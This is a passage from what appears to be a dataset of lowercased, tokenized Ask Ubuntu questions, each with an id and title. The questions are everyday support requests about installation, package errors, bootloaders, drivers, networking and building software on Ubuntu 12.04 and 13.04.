i have a couple of other older pcs i 'd like to play around with installing ubuntu on ; but , they only have cd-rom drives , not dvds . how can i get the 12.04.02-desktop iso to fit on a cd , or is that not possible ? thanx in advance for the help .
308702	annoying wireless authentication prompt	when my internet connection fails and tries to reconnect ( which happens quite frequently on my crappy uni wireless ) the following prompt pops up every 20-30 seconds : i consider this to be a major security flaw . what if i 've let someone else use the computer and the internet cuts out ? after 20 seconds this dialogue will pop up and they can just tick the box to reveal my password . not only that , it 's annoying . the damn thing obviously remembers my password , i would appreciate it not asking me over and over again whether i got it right . is there any way to disable this behaviour ? thanks in advance edit : making the wireless profile available to all users does not solve the problem ( the prompt keeps appearing ) and makes the security situation even more of a joke . please reopen ?
308704	acer 1410 external monitors	i want to be able to hook up two external monitors to my acer 1410. is that possible ?
308705	update manager broken package libxext6 and libxext6 : i386	this problem seems similar to some , but none of the fixes work . when i try to update , it reads/displays the packages , but it will not install . the error message i got in the terminal is : dpkg : error processing libxext6 ( -- configure ) : libxext6 : amd64 2:1.3.0-3build1 can not be configured because libxext6 is in a different version ( 2:1.3.0-3ubuntu0.1 ) dpkg : error processing libxext6 : i386 ( -- configure ) : libxext6 : i38 2:1.3.0-3ubuntu0.1 can not be configured because libxext6 : amd64 is in a different version ( 2:1.3.0-3build1 ) errors were encountered while processing : libxext6 libxext6 : i386 e : sub-process /usr/bin/dpkg returned and error code i have an intel processor , not an amd , if that helps . what should i do ? i 've tried : sudo apt-get update sudo apt-get upgrade sudo apt-get clear sudo apt-get autoclear sudo apt-get -f install sudo apt-get autoremove and a few other commands .
308708	ubuntu will not restart fully	i just installed ubuntu 13.04 on one of my hard drives : /dev/sdc i created a swap area partition ( 2 gigs ) and two 250 gig partitions for root and /home respectively . installation went flawlessly but after trying to reboot and boot into win7 i noticed that ubuntu would not fully restart . it closes the system and turns off feed to the monitors but the computer stays on and does n't reset .
308710	how to install a pptp vpn without a localip ?	as the title says , how can i set up a pptp vpn without a localip ? what i mean by this is i have an external ip ( 69.164.212.xxx ) , but no local ip as this is a server hosted in a datacenter , each vps has it 's own ip . i 'm currently running ubuntu 12.04 , but i can easily switch over to whatever version is required for this . and for anyone wondering , my server is a vps hosted by linode .
308713	trackpad driver	i have an hp pavilion that came with windows 7 . it has a feature that when i slide two fingers across the track pad it scrolls the current page . this works well in windows 7 but does not work in ubuntu . in windows i can go to device manager and at least find out what drivers i 'm missing . is there something in ubuntu that is analogous to this ? somewhere where i can see what hardware i have and what drivers i need to make it work ?
308714	updates to fuse.conf are not available	i 'm attempting to add the following so that i can use my nexus 4 with ubuntu . but the change in /etc/fuse.conf does n't seem to be captured by the system . see below . system76 : ~ $ sudo tail -1 /etc/fuse.conf ; id -a ; android-connect user_allow_other 104 ( fuse ) fusermount : failed to open /etc/fuse.conf : permission denied fusermount : option allow_other only allowed if 'user_allow_other ' is set in /etc/fuse.conf what am i missing ?
308716	what is the matter with wine 1.6 in ppa : ubuntu-wine/ppa ?	i use ppa : ubuntu-wine/ppa in 12.04 . today when i update system , it remove my old wine 1.5 , but 1.6 can not be installed . what about you ? thanks edit : i use 'apt-get dist-upgrade ' to update system . now i first remove wine 1.5 and install wine 1.6 . $ sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : ttf-umefont libipc-run-perl libnet-ip-perl diffstat libnet-dns-perl libclone-perl libsbsms10 libportsmf0 language-pack-kde-zh-hans-base libio-pty-perl wine-gecko1.4 wine-gecko1.4 : i386 wine-gecko1.9 wine-gecko1.9 : i386 audacity-data language-pack-kde-en kde-l10n-engb libnet-domain-tld-perl language-pack-kde-zh-hant-base libemail-valid-perl ttf-unfonts-core libvamp-hostsdk3 kde-l10n-zhcn language-pack-kde-zh-hans language-pack-kde-zh-hant kde-l10n-zhtw language-pack-kde-en-base libdigest-hmac-perl use 'apt-get autoremove ' to remove them . the following extra packages will be installed : wine1.6 wine1.6-amd64 wine1.6-i386 : i386 suggested packages : dosbox : any the following new packages will be installed : wine wine1.6 wine1.6-amd64 wine1.6-i386 : i386 0 upgraded , 4 newly installed , 0 to remove and 2 not upgraded . need to get 0 b/50.2 mb of archives . after this operation , 246 mb of additional disk space will be used . do you want to continue [ y/n ] ? selecting previously unselected package wine1.6-amd64 . ( reading database ... 397044 files and directories currently installed . ) unpacking wine1.6-amd64 ( from ... /wine1.6-amd64_1.6~rc2-0ubuntu1~ppa1_amd64.deb ) ... selecting previously unselected package wine1.6-i386 : i386 . unpacking wine1.6-i386 : i386 ( from ... /wine1.6-i386_1.6~rc2-0ubuntu1~ppa1_i386.deb ) ... unpacking wine1.6 ( from ... /wine1.6_1.6~rc2-0ubuntu1~ppa1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/wine1.6_1.6~rc2-0ubuntu1~ppa1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/wine64-preloader ' , which is also in package wine1.6-amd64 1.6~rc2-0ubuntu1~ppa1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) selecting previously unselected package wine . unpacking wine ( from ... /wine_1.6~rc2-0ubuntu1~ppa1_amd64.deb ) ... errors were encountered while processing : /var/cache/apt/archives/wine1.6_1.6~rc2-0ubuntu1~ppa1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
308717	how do i login as root	in order to change the usb device mount from 'media ' to 'scd ' i need root privleges . how do i sign in as root using xterm ?
308719	old compaq desktop	i have a compaq presario sr1265cl desktop that was given to me . it has windows xp on it and i want to replace it with ubuntu . i have n't had much luck with any linux distribution being able to boot when i try . if anyone has a suggestion on what to due it would be great .
308720	offline speech recognition application for dictation with word processor like libreoffice	i 'm aware that there 's already same question thing , but they either did n't work or are outdated so here it is ... i could use a speech-to-text thing that preferentially can enter into writers ( i have the libreoffice one ) , microphone input , but has to work offline . i 'm on 12.10 ( might upgrade to 13 soon , who knows ... ) , and i 've tried installing simons , julius and all those things but ca n't get none to work ( skill problem is there , but usually can get around nicely if there 's a nice tutorial at hand ) . thanks in advance .
308727	rsa ssh public key fails ubuntu 12.04 desktop edition , works when logged into gui	i first say , thanks for your time , this may be a known issue but i could n't find it the answer . how to replicate : copy your public ssh rsa key to ~/.ssh/authorized_keys reboot ubuntu 12.04 desktop edition try to ssh ( it will prompt for password ) how to fix : go to the server and log into unity . now ssh public key auth works fine . alternate fix : ssh the server ssh it again , now public key auth will work fine . this behavior is unusual ( i 'm a linux admin ) hopefully someone knows a workaround ?
308730	error while installing g++	i am getting this error : sathiesh @ sathiesh : ~ $ sudo apt-get install g++ [ sudo ] password for sathiesh : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
308737	compiled wireshark 1.10.0 presents an uncomplete interface in ubuntu 12.04	i compiled wireshark 1.10.0 in my ubuntu 12.04 but it presents an incomplete user interface like in this image ( the missing part is at the bottom ) . this seems to be something wrong with unity because when i disable 'ubuntu unity plugin ' in ccsm this problem disappeared.any help will be appreciated .
308742	update manager gives updates for older kernel	i upgraded my kernel to 3.9.xx from 3.2.xx . but the update manager still shows these updates : header files related to linux kernel version 3.2.0 linux kernel headers for version 3.2.0 on 64 bit x86 smp generic linux kernel headers linux kernel headers for development why is the update manager still showing me updates for the 3.2 kernel instead of showing updates for the 3.9 kernel ?
308750	suspend in ubuntu 12.04 does n't work correctly	after click the `` suspend '' in ubuntu 12.04 laptop screen turns black , but does not turn off . notebook cooler continues to work , the leds on the connected usb flash drives are still lit . what to do ? ( notebook sony vaio vgn-cr31sr ) .
308753	ubuntu 13.04 is slow on my pc	i have recently installed ubuntu 13.04 on my pc , and it 's quite slow . i 'm not sure what is causing the trouble , but it looks to me like it 's unity , because all the applications take a long time to start . i have an intel core 2 duo 2.2 ghz cpu and 1.5gb ram . i do n't have any extra graphics or video card installed . and from what i have read i know that unity uses a lot of gpu if there is a gpu installed . so if this is the cause of my poor system performance , would switching to a new desktop environment be advisable ? do you have any other suggestions for how to improve my system 's performance ?
308754	no additional driver	i installed ubuntu 11.04 with wubi on win 7 , i upgrade it to 13.04. every i upgrade my system from to 11.04 - 13.04 never see my additional driver detect my gt540 nvidia card.i am only use internal graphics processor.anyone have solution ?
308758	installation of ubuntu 12.04 terminates every time	i tried to install ubuntu 12.04 on my laptop alongside windows 7 as a dual boot pc . after selecting the option install ubuntu alongside windows 7 , a black screen comes up showing the message terminating all installation processes . then my pc reboots to windows 7 , and the installation terminates . i have enough space on my hard disk ( at least 30gb free on disk c on which windows 7 is installed ) . what should i do ?
308760	w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available:	i get the following error when i do sudo apt-get update w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 6af0e940624a220 i tried following ways after reading various questions here and also by googling . i tried sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 6af0e1940624a220 did not help . i also tried sudo gpg -- keyserver hkp : //keyserver.ubuntu.com:80 -- recv-keys thinking port 11371 ( default ) may be blocked due to firewall . i also tried to reset everything as follows sudo rm /var/lib/apt/lists/* -vf sudo apt-get update & & sudo apt-get upgrade still i get the same error or get update.any other possible solution i can try ?
308767	installed ubuntu 12.0 on employer but did not display unity desktop	i installed ubuntu desktop 12.0 lts on employer but did not display unity desktop . i try to use sudo apt-get install unity it said the unity had been the latest version . odes this mean hard problem ? itonlydisplay terminal white/black text i try unity -- reset it said gconf warning : client failed to connect to the d-bus daemon x11 initialisation failed
308774	is there a way to gain superuser access from a qt app	i 'm designing an app that needs to configure iptables with root . is there already some sort of framework that can be used to gain superuser access with an app or will i have to design my own ?
308776	what are the names of all released versions of ubuntu ?	i 'm working on an icon theme for gtk+ and i 'm creating package in ppa and i want to know all the names of ubuntu for packages . so far i 've created deb packages for oneiric natty maverick lucid
308783	save microphone and audio out volume levels in pulseaudio to a file that can be restored from	i have to fiddle around far too often to use skype , and it 's not clearly skype 's fault . i want to work around the problem by saving the audio level settings to disk and restoring them . please tell me this is possible : d
308793	`` gzip : stdout : no space left on device ''	after the recent updates i 've installed i got the following error when installing or uninstalling apps from ubuntu software center on ubuntu 13.04 : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 332535 files and directories currently installed . ) removing gelemental ... processing triggers for hicolor-icon-theme ... processing triggers for menu ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... setting up linux-image-extra-3.8.0-25-generic ( 3.8.0-25.37 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic update-initramfs : generating /boot/initrd.img-3.8.0-25-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-25-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.8.0-25-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.8.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-extra-3.8.0-25-generic ; however : package linux-image-extra-3.8.0-25-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.25.43 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-extra-3.8.0-25-generic linux-image-generic linux-generic error in function : setting up linux-image-extra-3.8.0-25-generic ( 3.8.0-25.37 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-25-generic /boot/vmlinuz-3.8.0-25-generic update-initramfs : generating /boot/initrd.img-3.8.0-25-generic gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-25-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-extra-3.8.0-25-generic.postinst line 1010. dpkg : error processing linux-image-extra-3.8.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-extra-3.8.0-25-generic ; however : package linux-image-extra-3.8.0-25-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured it says there is not space left on the device , but i actually have plenty of space , the only partition that has 24 mb free is the boot partition , but how to access is it and what to do there if this is the problem ?
308799	which ubuntu can i install in my computer ?	i have one motherboard ( asrock , model p4i65gv ) and i do n't know which ubuntu its the correct software to put it ! is better the x32bit bit or x64 bit ? please can someone help me ?
308801	no permissions on new partition .	i am a novice linux/ubuntu user who is just discovering the joys of a lightweight , free software environment which gives control to the user . to protect some of my data ( photos ) from the rigours of os crashes/reinstallation etc . i have created a small storage partition on my primary hard disk using gparted at /dev/sda3 using the ext4 filesystem . on startup the partition auto-mounts to /media/chris/photo storage . i can see the drive at this location , and in the unity launcher . the only problem is i have no permissions to use the 'drive ' and hence can not copy files into it , add folders or in fact do anything in the storage area . my question is how to i give myself permissions within my normal ubuntu account to use it ? best regards , chris
308807	what arm tablet can i run regular ubuntu and xbmc and hook up an external hdd ... ?	i want to run xbmc on an arm tablet , using bluetooth keyboard and an external 4tb hard drive to substitute a typical htpc . . p.s . : htpc does n't exist as a tag ... can someone who is not new here create it ?
308809	no internet for terminal- connect through a proxy	i 'm using newly installed 13.04 on my lap . i 've connected to wifi connection in our university and configured the proxy settings in network settings . i can access web and even software updater work nicely , but using the terminal i even ca n't ping into a website . `` ping google.com '' gives 100 % packet loss
308811	installed windows 8 and it replaced burg bootloader	hey guys i was using windows 7 with ubuntu 12.10 and not installed windows 8 on the same partition as windows 7 . but its replared my burg bootloader and now its just loading windows 8 . so what can i do to get my burg bootloader back ? what i have tried till now : searched a lot on askubuntu but didnt get my solution . booted in with ubuntu 12.10 live usb and tried sudo update-grub but it gave me an error /usr/sbin/update-grub : 3 : exec : grub-mkconfig : input/output error so guys tell me what i can do to get back my burg bootloader ... yeah i was using burg back not grub ... but right now even grub will do . thanks
308814	grub error after removing partition	so i think i 've possibly done something pretty dumb . basically i was running out of space on my ubuntu partition and i knew i had a 40gb partition at the end of the disk which was called os2 . i 'm 99 % sure this was one i created years ago when i first had the idea of dualbooting my computer ( long before i actually got around to doing it ) and i double checked on the drive , there was nothing on it . so i installed gparted live usb , ran it , formatted the ntfs os2 partition into ext2 format and rebooted computer . now i get the following error from grub : error : file '/boot/grub/i386-pc/normal.mod ' not found . grub rescue > obviously the `` grub rescue '' bit is a command prompt , but other than that , there 's nothing i can do with the computer . what can i do to get my computer back ? many thanks ! luke
308824	switched graphics card , now major problems	i have an old nvidia 9600gt , which i pulled out of my computer dual booting with windows 7 and 13.04 . i then plugged in a hd6670 . i did n't think to uninstall drivers in 13.04 , so i started my computer up and tried to do it after i have plugged the card in . big mistake . windows 7 works fine , but my ubuntu is a mess . on booting into ubuntu , the graphics were very glitchy with colours everywhere and flickering . i could make out my terminal from ctrl-alt-t , and followed the instructions to download and install amd drivers . everything went well until i got to the config , which failed . i tried a few solutions posted online , but nothing worked , so now i 've swapped my 9600gt back in . i do n't have the official nvidia drivers , but the graphics at least are n't glitchy . however , my desktop has dissappeared , and just my wallpaper is visible . i can launch a terminal , which is how i 'm writing this message , but not much else . i 've tried reinstalling ubuntu-desktop , where it merely states the most recent version is already installed . i also tried resetting unity , which gave me the following output : error : the reset option is now deprecated and now i 'm stuck . i played around with a few files including xorg which seems to have got me in my current mess . any help with my situation would be greatly appreciated !
308825	`` sh : 1 : can not open /tmp/pdfsandwich4e375e.html : no such file '' when using pdfsandwitch	i tried to add a textlayer to some pdf files in order to make them searchable . this technique is explained in the german ubuntu wiki : http : //wiki.ubuntuusers.de/pdfsandwich . after installing dependencies sudo apt-get install imagemagick exactimage ghostscript tesseract-ocr and pdfsandwich itself it should be as simple as pdfsandwich test.pdf however i get : input file : `` test.pdf '' output file : `` test_ocr.pdf '' number of pages in inputfile : 272 parallel processing with 8 threads started . processing page order may differ from original page order . processing page 137 . processing page 171 . processing page 1 . pprocessing page processing pprocessing page rocess35 . age 239 . processing page 69 . 205. ing page 103. sh : 1 : can not open /tmp/pdfsandwich4e375e.html : no such file followed by many more can not open ... warnings . inspection of my /tmpdirectory shows that instead of these *.html files the corresponding *.txt files exist . seemingly tesseract does not output in hocr format . i read the man pages of tesseract and tried to enforce hocr output by creating a config file named tesseract-config hocr true ( i tried various variations thereof ) and starting pdfsandwich with pdfsandwich -tesso tesseract-config test.pdf but this does not seem to change anything . any ideas how i can make pdfsandwich produce proper output ? note the related questions how to add ocred text to original pdf in gscan2pdf ? and adding ocr info to a pdf . however i need to process many pdf files and therefore i need a command-line solution which i can automate .
308841	ubuntu 12.04 installation alongside windows 7	i want to install ubuntu 12.04 alongside windows 7 . i downloaded ubuntu and burned it in dvd , but when i tried to install it ( i used both try ubuntu and install ubuntu options . ) , only purple screen with ubuntu logo comes and nothing happens . note:1.the downloaded ubuntu works fine in virtual box . if something goes wrong , i do n't have windows 7 dvd to repair the loader problems .
308842	13.04 hp laptop dv6t intel quad edition no headphone sound when plugged in	this is my alsa output http : //www.alsa-project.org/db/ ? f=5dba3e3cc98914f6dce181eaa548769da5a0e6d8 i have followed this old solution that solved my problem for ubuntu 12.04 , but in 13.04 the say solution wo n't work . headphone jack not working ? so i have change my os from ubuntu to linux mint 15 ( which is 13.04 based ) the old solution still does n't solve my problem with headphone jack . when i put my headphone in , the speaker will mute , but nothing will come out from headphone . many thanks . i love ubuntu , it has been my primary os for the last year for 12.04 , i want to upgrade to 13.04 .
308847	after installing ubuntu 12.04 alongside windows 7 , i am unable to use my mouse , connect to the internet , or power down !	i recently installed ubuntu 12.04 alongside windows 7 on my 64 bit laptop . after installation , everything worked fine until the next time i restarted the computer . the next time i restarted , my mouse would not move or click , the computer would not connect to the internet , and i could not turn off the computer without doing a hard-reset ! ! ! ! i have tried many different methods but none seem to work . any help would be appreciated .
308859	large amount of scrollable text in ubuntu touch	is there a way to make a label scrollable in ubuntu touch sdk . if not what is another way to have a large amount of uneditable text that can scroll .
308862	juju status timeout error 111 connection refused please help	i am setting up juju local environment using getting started tutorials everything go smooth until i reboot my physical machine after reboot when i tried to bootstrap its says already bootstrapped but i cant see status see my status $ juju -v status 2013-06-16 17:49:03,643 debug initializing juju status runtime 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ log_env @ 712 : client environment : zookeeper.version=zookeeper c client 3.4.5 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ log_env @ 716 : client environment : host.name=ubuntu 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ log_env @ 723 : client environment : os.name=linux 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ log_env @ 724 : client environment : os.arch=3.8.0-25-generic 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ log_env @ 725 : client environment : os.version= # 37-ubuntu smp thu jun 6 20:47:07 utc 2013 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ log_env @ 733 : client environment : user.name=user 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ log_env @ 741 : client environment : user.home=/home/user 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ log_env @ 753 : client environment : user.dir=/home/user 2013-06-16 17:49:03,659:4613 ( 0x7fe71fce5740 ) : zoo_info @ zookeeper_init @ 786 : initiating client connection , host=10.0.3.1:48315 sessiontimeout=10000 watcher=0x7fe71e2ea850 sessionid=0 sessionpasswd= < null > context=0x2bcb640 flags=0 2013-06-16 17:49:03,659:4613 ( 0x7fe71a60f700 ) : zoo_error @ handle_socket_error_msg @ 1697 : socket [ 10.0.3.1:48315 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2013-06-16 17:49:06,996:4613 ( 0x7fe71a60f700 ) : zoo_error @ handle_socket_error_msg @ 1697 : socket [ 10.0.3.1:48315 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2013-06-16 17:49:10,332:4613 ( 0x7fe71a60f700 ) : zoo_error @ handle_socket_error_msg @ 1697 : socket [ 10.0.3.1:48315 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2013-06-16 17:49:13,669:4613 ( 0x7fe71fce5740 ) : zoo_info @ zookeeper_close @ 2522 : freeing zookeeper resources for sessionid=0 traceback ( most recent call last ) : failure : txzookeeper.client.connectiontimeoutexception : could not connect before timeout 2013-06-16 17:49:13,669 error traceback ( most recent call last ) : failure : txzookeeper.client.connectiontimeoutexception : could not connect before timeout 2013-06-16 17:49:13,669 error could not connect before timeout see raw log
308863	compiling apib undefined reference to symbol 'pthread_create @ @ glibc_2.2.5 '	i want to compile apib on my ubuntu 13.04 box but i am having issues with pthread lib . this is the error that i get : $ colormake -j 5 cd src & & make all make [ 1 ] : entering directory `/home/monkey/bin/apib-1_0/src' gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_cpu.o apib_cpu.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_iothread.o apib_iothread.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_lines.o apib_lines.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_main.o apib_main.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_oauth.o apib_oauth.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_reporting.o apib_reporting.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_priorityq.o apib_priorityq.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_url.o apib_url.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -g -o2 -i . -i/usr/include/apr-1.0 -dhave_config_h -d_gnu_source -c -o apib_mon.o apib_mon.c gcc -std=gnu99 -pedantic -wall -wno-deprecated-declarations -o ../apibmon apib_mon.o apib_lines.o apib_cpu.o -lapr-1 /usr/bin/ld : apib_mon.o : undefined reference to symbol 'pthread_create @ @ glibc_2.2.5' /usr/bin/ld : note : 'pthread_create @ @ glibc_2.2.5 ' is defined in dso /lib/x86_64-linux-gnu/libpthread.so.0 so try adding it to the linker command line /lib/x86_64-linux-gnu/libpthread.so.0 : could not read symbols : invalid operation collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ ../apibmon ] error 1 make [ 1 ] : *** waiting for unfinished jobs ... . make [ 1 ] : leaving directory `/home/monkey/bin/apib-1_0/src' make : *** [ all ] error 2 whereas all needed libraries are installed : $ dpkg -l | grep apr & & dpkg -l | grep libssl ii libapr1 1.4.6-3ubuntu1 amd64 apache portable runtime library ii libapr1-dev 1.4.6-3ubuntu1 amd64 apache portable runtime library - development headers ii libaprutil1 1.4.1-3 amd64 apache portable runtime utility library ii libaprutil1-dbd-sqlite3 1.4.1-3 amd64 apache portable runtime utility library - sqlite3 driver ii libaprutil1-dev 1.4.1-3 amd64 apache portable runtime utility library - development headers ii libaprutil1-ldap 1.4.1-3 amd64 apache portable runtime utility library - ldap driver ii libssl-dev 1.0.1c-4ubuntu8.1 amd64 ssl development libraries , header files and documentation ii libssl-doc 1.0.1c-4ubuntu8.1 all ssl development documentation documentation ii libssl1.0.0 : amd64 1.0.1c-4ubuntu8.1 amd64 ssl shared libraries ii libssl1.0.0 : i386 1.0.1c-4ubuntu8.1 i386 ssl shared libraries in makefile : apr_libs = -l/lib/x86_64-linux-gnu/ -lm -lcrypto -lpthread -lssl -lapr-1 -laprutil-1
308864	what 's the latest version of fglrx on ubuntu 13.04 ?	i just installed the driver via software sources ( fglrx-updates ) , and fglrxinfo shows that i 've got the 9.012 version , which is not the catalyst 13.4 , right ? is the 9.012 the latest version in ubuntu repositories ? thanks !
308866	firefox save to pdf ?	on my nexus 7 running android , i 've installed firefox . one thing i really love about it , is that it enables me to save websites as pdf right out of the box . now i 'd like to do the same thing in firefox on my ubuntu 12.04lts desktop . do i need an extension for this , and if so , can someone recommend one ? i know i can print to pdf , but that 's not entirely the same .
308867	acer aspire 4710 : additional drivers in kubuntu 13.04	after a clean install of kubuntu 13.04 i386 on an acer aspire 4710 , the broadcom bcm4311 wireless adapter worked , but would disconnect from time to time , and not reconnect reliably . the `` additional drivers '' application showed that proprietary drivers were available . after installing these and restarting , no wireless connection was available and the `` additional drivers '' application was empty -- it reports no proprietary drivers are available and none are in use on the computer . i connected via ethernet and did a full system update , restarted , and ran `` additional drivers '' again , but it is still empty and i still have no wireless connection available . suggestions please .
308870	no gnome login sound in startup applications ?	there is no `` gnome login sound '' option in startup application ?
308871	icecast and darkice combination high-latency	i have successfully installed icecast and darkice on my ubuntu machine and was able to stream live on my lan . but to my disappointment it has a 15sec to 20sec delay.this is very poor performance . i do n't think it is because of my lan connection because even when i tried to listen in that same ubuntu machine there was still a delay ! i have tried to configure icecast to have no burst-size which means there will be no buffering , this helped me reduce the delay to around 6sec to 8sec . so please if you have any suggestions or very good configuration values it would be of great help to me . p.s the format i am streaming is mp3 . someone suggested that i should use opus codec but i do n't think icecast or darkice support it . and i am streaming in firefox using the html5 audio tag .
308873	how to add and play extracted youtube files on rhythmbox ?	when i used to have windows , i used to be able to save the file i was downloading to a custom folder and then drag that file to windows media player . is there any way to do the same on rhythmbox ? when i downloaded a youtube file today , i saved it to a custom folder in the music folder , thinking i could import it to rhythmbox like i do any other extracted music . but when i click `` import , '' there are no files that can be imported from the music folder and even with the right plugins that i installed , the box shows `` not playing '' how do i resolve this ?
308876	how to make a dependency to the latest version of boost ?	i 'm packaging a couple of libraries that have some dependencies with one-another . to simplify , let 's say i have : liba and libb . libb depends on liba for both building and installing . liba depends on libboost-system-dev ( > = 1.49 ) for building , and libboost-system ( > = 1.49 ) for installing . liba 's package builds successfully using cowbuilder but when trying to build libb 's package , i get the following error : the following packages have unmet dependencies : liba1 : depends : libboost-system ( > = 1.49 ) which is a virtual package . unable to resolve dependencies ! giving up ... obviously , cowbuilder does not know which libboost-system package to install . i 'd like to avoid having to write libboost-system1.49 in liba 's installation dependencies so that it always uses the latest available boost version . how can i fix that ?
308886	launcher replaced by gray area in ubuntu virtualbox	i had installed ubuntu 12.10 desktop i386 on virtualbox 4.2.12 on windows 7 . after enabling 3d acceleration in settings , launcher ( left side application pane\taskbar ) did not appear . so i disabled it and i got like this : i ran the command unity -- replace and the following was shown . the launcher first came into view and immediately disappeared being replaced by the gray area as shown in the above image . here is the output of unity -- replace please offer your assistance in helping me solve this problem .
308896	why network manager ca n't detect my zte usb 3g modem !	i am using ubuntu 12.10 . i use a zte usb 3g modem to connect to internet . i connect that modem through a driver software which was provided with the modem . this modem works fine . i can browse , use apt-get through terminal . but the problem is network-manager cant detect my modem . it shows nothing in the top bar . because of this i - ca n't use ubuntu software center ca n't use vpn services ca n't create wifi hotspot first of all i am telling what i have noticed about this modem : when i connect this modem first time that driver software ca n't detect it . this time ' lsusb ' command give this lsusb ( before ) . after unplugging and plugging for 2-3 times that software can detect modem and output of lsusb changed to lsusb ( new ) . and ths time ubuntu also find a cd-rom by which driver software is delivered . but if i connect modem before starting ubuntu that driver software can detect modem at first time ! ! i have tried to connect this modem through ' mobile broadband ' option but unfortunately this option ca n't detect my modem under ' create a connection for this mobile broadband device ' option . i think that driver software use wvdial to connect to the internet as i have to install wvdial before installing that software . i have tried to connect to internet using wvdial from terminal . wvdial works fine . and i can use internet . but ca n't solve network-manager problem . also used sakis3g . sakis3g can connect my modem but this also ca n't solve the network-manager problem . now i am telling what i have done till now to solve that network-manager problem : i have tried this code with root privilege : echo vendor productid > /sys/bus/usb-serial/drivers/option1/new_id it did n't work . one more 